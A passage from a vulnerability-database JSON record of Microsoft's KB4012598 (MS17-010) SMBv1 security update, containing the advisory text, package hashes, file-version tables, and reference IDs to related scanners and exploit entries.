applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>103,936</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>103,936</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>304,640</td><td>11-Feb-2017</td><td>15:22</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>305,152</td><td>11-Feb-2017</td><td>15:19</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>146,432</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink></body></html>", "published": "2017-03-14T00:25:04", "modified": "2017-03-14T17:40:16", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0147"], "immutableFields": [], "lastseen": "2019-10-24T22:39:58", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"modified": "2019-10-24T22:39:58", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["CVE-2017-0147"], "type": "cve"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-24T22:39:58", "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "MS17-010", "mscve": "CVE-2017-0147", "msplatform": "", "msfamily": "Windows", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": ["13230", "14113", "13228", "11721", "14210", "11728", "11740", "11733", "11719", "13236", "13233", "14440", "13234", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "f62ed778-6986-d76e-c007-40a28315ffbf", "928d79ba-72eb-762f-39be-122173e95922", "fd3a2888-0af1-3691-5303-bc85b4302e62", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "2b2eeb95-d89c-6614-0db5-88f09133ede6"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "name": "Windows Server 2008", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}]}, "lastseen": "2019-10-24T22:39:58", "differentElements": ["cvelist", "cvss", "mscve", "msfamily", "published"], "edition": 2}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "869993357a37829e217b59ee9999c2d2", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important <br/><br/></span><ul class=\"sbody-free_list\"> <li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Get security updates automatically</a>. <br/><br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span></span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><formatting type=\"H3\">File hash information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4012598-ia64.msu</td><td>83A6F5A70588B27623B11C42F1C8124A25D489DE</td><td>29B40D7E75186A9CCC9F2F309417E374846F35F41B4D1DE6DBE85F439DC1837F</td></tr><tr><td>Windows6.0-KB4012598-x64.msu</td><td>6A186BA2B2B98B2144B50F88BAF33A5FA53B5D76</td><td>A91A0AF728225FF2A630B9ABA4E639473AA8ABE7CAA23BE10AE48A7887BDE9C8</td></tr><tr><td>Windows6.0-KB4012598-x86.msu</td><td>13E9B3D77BA5599764C296075A796C16A85C745C</td><td>FC7F28A72C117C2A8ECE5916532048C8BF3379C86386348C24319EAC2C6B23C8</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H3\">File information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><boilerplate boilerplatename=\"QFEFileAttributes\" version=\"7\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables.</boilerplate><formatting type=\"H4\">Windows Vista and Windows Server 2008 file information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><formatting type=\"B\">Notes: </formatting>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><formatting type=\"H5\">For all supported ia64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>15:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:01</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>16:55</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:14</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:35</td><td>IA-64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:16</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>297,984</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>297,984</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>967,168</td><td>11-Feb-2017</td><td>15:31</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>969,216</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>468,480</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>474,624</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>233,984</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>239,104</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>289,792</td><td>03-Aug-2016</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>16:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>263,168</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:16</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,952</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>248,320</td><td>03-Aug-2016</td><td>17:02</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>261,120</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,152</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>231,936</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>233,984</td><td>11-Feb-2017</td><td>17:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>239,104</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>289,792</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>263,168</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:42</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:41</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,952</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>248,320</td><td>11-Feb-2017</td><td>17:37</td><td>Not 